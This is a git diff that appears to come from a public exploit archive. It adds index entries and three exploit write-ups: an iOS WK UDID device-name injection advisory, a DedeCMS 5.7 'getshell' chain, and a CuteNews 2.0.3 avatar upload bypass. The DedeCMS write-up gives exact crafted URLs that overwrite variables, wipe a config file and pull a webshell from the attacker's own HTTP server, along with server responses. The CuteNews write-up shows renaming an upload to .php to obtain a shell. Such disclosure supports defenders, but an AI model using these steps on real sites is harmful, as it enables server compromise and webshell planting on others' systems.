diff --git a/files.csv b/files.csv
index b9e3d10ba..a03cb739b 100755
--- a/files.csv
+++ b/files.csv
@@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
+37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
@@ -33820,6 +33821,7 @@ id,file,description,date,author,platform,type,port
37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
+37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
@@ -33834,3 +33836,4 @@ id,file,description,date,author,platform,type,port
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
+37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
diff --git a/platforms/ios/webapps/37492.txt b/platforms/ios/webapps/37492.txt
new file mode 100755
index 000000000..653e03935
--- /dev/null
+++ b/platforms/ios/webapps/37492.txt
@@ -0,0 +1,163 @@
+Document Title:
+===============
+WK UDID v1.0.1 iOS - Command Inject Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1539
+
+
+Release Date:
+=============
+2015-07-01
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1539
+
+
+Common Vulnerability Scoring System:
+====================================
+5.6
+
+
+Product & Service Introduction:
+===============================
+This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be
+selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about
+the unique identifier (UDID), the model, the name and the operating system of your device.
+
+(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-07-01: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+WK EDV GmbH
+Product: WK UDID - iOS Mobile Web Application 1.0.1
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
+The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.
+
+The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value
+of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function.
+Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector
+of the vulnerability is server-side and the injection point is the device name information settings.
+
+The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
+Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction.
+Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
+compromise the mobile iOS application and connected device components.
+
+Vulnerable Module(s)
+ [+] Device - Settings - Information
+
+Vulnerable Parameter(s)
+ [+] device name
+
+Affected Module(s)
+ [+] WKUDID - Mail
+
+
+Proof of Concept (PoC):
+=======================
+The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+1. Start the iOS device
+2. Open the settings module
+3. Change the name to the local command injection payload
+4. Save the settings and start the application wkudid
+5. Send the details by mail
+6. Review the arrival inbox
+7. The execution point is the xml and header location with the device name value
+8. Successful reproduce of the local command inject security vulnerability!
+
+
+PoC Device ID - Email
+
+Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
+
Model: iPad
Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20
+System Name: iPhone OS
System Version: 8.3
Total Memory (RAM): 987.98 MB
+Free Memory: 19.06 MB
Total Storage: 27.19 GB
Free Storage: 0.70 GB
+CPU Frequency: an error occured
Network: WiFi
Wi-Fi: 02:00:00:00:00:00
+IP Address: 192.168.2.104
Carrier: not available
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the
+vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.
+
+
+Security Risk:
+==============
+The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/php/webapps/37423.txt b/platforms/php/webapps/37423.txt
new file mode 100755
index 000000000..62e007d8b
--- /dev/null
+++ b/platforms/php/webapps/37423.txt
@@ -0,0 +1,199 @@
+ ==========================
+# Exploit Title: Dedecms variable coverage leads to getshell
+# Date: 26-06-2015
+# Vendor Homepage: http://www.dedecms.com/]
+# Version: dedecms 5.7-sp1 and all old version
+# CVE : CVE-2015-4553
+===========================
+
+
+[CVE-2015-4553]Dedecms variable coverage leads to getshell
+#############################################################################
+#
+# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
+#
+#############################################################################
+#
+# CVE ID: CVE-2015-4553
+# Subject: Dedecms variable coverage leads to getshell
+# Author: zise
+# Date: 06.17.2015
+#############################################################################
+Introduction:
+========
+dedecms Open source cms
+Extensive application
+
+Influence version
+Newest dedecms 5.7-sp1 and all old version
+
+
+Remote getshell
+Details:
+=======
+After the default installation of dedecms
+Installation directory
+/install/index.php
+or
+/install/index.php.bak
+
+/install/index.php //run iis apache exploit
+/install/index.php.bak //run apache exploit
+
+
+Code analysis
+
+/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
+
+#############################################################################
+17 $install_demo_name = 'dedev57demo.txt';
+18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
+
+here $install_demo_name and $insLockfile definition
+// echo $install_demo_name; printf dedev57demo.txt
+
+29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
+30 {
+31 foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
+32 }
+
+
+// echo $install_demo_name; printf aaaa
+
+$install_demo_name by variable coverage
+
+The same
+17 $install_demo_name = 'dedev57demo.txt';
+18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
+
+variable coverage
+#############################################################################
+
+
+
+
+GETSHELL Step 1 Clear file contents config_update.php
+#############################################################################
+config_update.php
+13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
+14 $linkHost = 'http://flink.dedecms.com/server_url.php';
+
+In order to obtain the webshell need to control $updateHost
+So the use of variable coverags cleared config_update.php
+
+
+http://192.168.204.135/install/index.php.bak
+?step=11
+&insLockfile=a
+&s_lang=a
+&install_demo_name=../data/admin/config_update.php
+
+index.php.bak
+373 else if($step==11)
+374 {
+375 require_once('../data/admin/config_update.php');
+376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
+377
+378 $sql_content = file_get_contents($rmurl);
+379 $fp = fopen($install_demo_name,'w');
+380 if(fwrite($fp,$sql_content))
+381 echo ' [√] 存在(您可以选择安装进行体验)';
+382 else
+383 echo ' [×] 远程获取失败';
+384 unset($sql_content);
+385 fclose($fp);
+386 exit();
+387 }
+
+###
+HTTP/1.1 200 OK
+Date: Wed, 17 Jun 2015 06:55:23 GMT
+Server: Apache/2.4.12
+X-Powered-By: PHP/5.6.6
+Vary: User-Agent
+Content-Length: 55
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+ [×] 远程获取失败
+ ###
+
+
+
+
+###After execution file 0 byte ~ho~year~####
+2015/06/17 14:55 0 config_update.php
+ 1 file 0 byte
+
+
+
+GETSHELL Step 2
+#############################################################################
+Create local HTTP services
+
+zise:tmp zise$ ifconfig en0
+en0: flags=8863 mtu 1500
+inet 119.253.3.18 netmask 0xffffff00 broadcast
+
+zise:tmp zise$ mkdir "dedecms"
+zise:tmp zise$ cd dedecms/
+zise:dedecms zise$ echo "" > demodata.a.txt
+zise:dedecms zise$ cd ../
+zise:tmp zise$ python -m SimpleHTTPServer
+Serving HTTP on 0.0.0.0 port 8000 ...
+192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
+
+
+####
+http://192.168.204.135/install/index.php.bak
+?step=11
+&insLockfile=a
+&s_lang=a
+&install_demo_name=hello.php
+&updateHost=http://119.253.3.18:8000/
+
+####
+
+HTTP/1.1 200 OK
+Date: Wed, 17 Jun 2015 07:11:18 GMT
+Server: Apache/2.4.12
+X-Powered-By: PHP/5.6.6
+Vary: Accept-Encoding,User-Agent
+Content-Length: 81
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=utf-8
+
+ [√] 存在(您可以选择安装进行体验)
+
+
+index.php.bak
+373 else if($step==11)
+374 {
+375 require_once('../data/admin/config_update.php');
+376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
+377
+378 $sql_content = file_get_contents($rmurl);
+379 $fp = fopen($install_demo_name,'w');
+380 if(fwrite($fp,$sql_content)) //fwrite websehll
+381 echo ' [√] 存在(您可以选择安装进行体验)';
+382 else
+383 echo ' [×] 远程获取失败';
+384 unset($sql_content);
+385 fclose($fp);
+386 exit();
+387 }
+
+Attack complete
+you webshell
+
+http://192.168.204.135/install/hello.php
+
+
+
+> zise ^_^
+> Security researcher
+
+This is the vulnerability of some web pages
+http://seclists.org/fulldisclosure/2015/Jun/47
\ No newline at end of file
diff --git a/platforms/php/webapps/37474.txt b/platforms/php/webapps/37474.txt
new file mode 100755
index 000000000..366d4cbf4
--- /dev/null
+++ b/platforms/php/webapps/37474.txt
@@ -0,0 +1,48 @@
+ CuteNews 2.0.3 Remote File Upload Vulnerability
+ =================================================
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : Inj3ct0r.com 0
+1 [+] Support e-mail : submit[at]inj3ct0r.com 1
+0 0
+1 ########################################## 1
+0 I'm T0x!c member from Inj3ct0r Team 1
+1 ########################################## 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+
+
+# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
+# Date: [02/07/2015]
+# Exploit Author: [T0x!c]
+# Facebook: https://www.facebook.com/Dz.pr0s
+# Vendor Homepage: [http://cutephp.com/]
+# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
+# Version: [2.0.3]
+# Tested on: [Windows 7]
+# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
+==========================================================
+ # Exploit :
+
+Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
+
+ 1 - Sign up for New User
+ 2 - Log In
+ 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
+ 4 - Select Upload Avatar Example: Evil.jpg
+ 5 - use tamper data & Rename File Evil.jpg to Evil.php
+
+-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
+
+6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
+
+ Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
\ No newline at end of file